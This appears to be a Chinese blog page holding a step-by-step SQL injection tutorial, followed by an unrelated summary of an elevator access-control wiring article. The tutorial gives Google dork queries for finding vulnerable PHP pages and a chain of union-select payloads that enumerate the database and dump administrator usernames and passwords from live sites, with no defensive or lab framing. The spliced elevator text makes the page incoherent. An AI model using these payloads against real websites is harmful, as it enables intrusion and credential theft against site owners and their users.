sql 注入

1。在google里面搜索site:www.domain.com inurl:php?nid(uid,gid)=

2。打开页面,在url后面加上',判断注入点

3。在url后面加上 order by 10-- 判断这个库里面有多少字段

=====================================

一般不能order by的注入点是因为URL那个参数就是order by 后面的值
比如www.hackme.com/file.php?id=22
SQL是select xx from xx where xx=xx order by $id 所以我们不能再order by了
这样的情况可以用union Select 1--   union select 1,2--  union select 1,2,3-- ...
这样递增的方式来取得字段数

=====================================

4。在url后面 加上 and 1=2 union all select 1,2,3,4,5--判断页面显示字段是那几个字段

5。在url上用and 1=2 union all select 1,2,version(),4,5--判断mysql的数据库版本

6。在url上用and 1=2 union all select 1,2,user()4,5--判断mysql的当前的用户名

7。用and 1=2 union all select 1,2,database()4,5--判断mysql当前的数据库名

8。用and 1=2 union all select 1,2,table_name,4,5 from information_scheam.tables where table_schema=(刚才查到数据库名的16进制显示) limit 0,1-- 找这个数据库里面的用户密码管理表,通过修改limit后面的0来查找(一般是admin,administrator等等名称的表)。

==========================================

如果报出:解决联合查询Illegal mix of collations for operation 'UNION'问题,这个错误的原因是两个段的编码不同导致的,这是只要加个hex就可以了如:unhex(hex(table_name))

==========================================

9。用and 1=2 union all select 1,2,column_name,4,5 from information_scheam.columns where table_name=(表名的16进制显示) limit 0,1-- 通过控制limit后面的0找到这个表里面的管理用户名和密码的那2个列的名称 

10。用and 1=2 union all select 1,2,username,password,5 from administrators limit 0,1--,通过控制limit来显示保存在表里面的用户名和密码

 

内容概要:文章详细介绍了电梯门禁(梯控)系统的硬件安装与接线要点。首先强调了梯控板与楼层按键对接的重要性,包括遵循一一对应原则以避免错层、越层问题,允许空层存在以适应实际需求。接着阐述了不同接线方式(COM、NO、NC端口的不同组合)对用户权限的影响,如单层权限用户刷卡直达指定楼层,多层权限用户在特定接线方式下的操作限制。硬件安装方面,强调了无源干触点设计原则以确保电气隔离,防止系统间干扰,以及读卡器接入时的规范要求。文章还介绍了梯控系统的技术原理,如身份验证机制(二维码/IC卡/人脸识别)、消防联动功能(紧急情况下释放所有楼层权限),并指出该系统适用于小区、写字楼等场景,支持机器人乘梯SDK扩展。最后,根据不同场景需求提出了适用的接线方式选择,如严格管控场景下选择4.3接线以实现精准权限控制,限制多层用户手动选层场景下选择4.1接线并配合软件权限设置。; 适合人群:从事电梯安装维护的技术人员、楼宇自动化工程师及相关领域的管理人员。; 使用场景及目标:①指导技术人员正确安装和接线梯控系统,确保系统安全稳定运行;②帮助管理人员了解不同接线方式对用户权限的影响,以便根据实际需求选择合适的配置方案;③提升楼宇安全管理和服务质量,特别是在小区、写字楼等场所的应用。; 其他说明:梯控系统的正确安装和接线不仅关系到系统的正常运作,更直接影响到用户的安全和使用体验。因此,在实际操作中务必严格按照规范执行,同时关注最新的技术发展和应用场景变化,以确保系统始终处于最佳状态。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值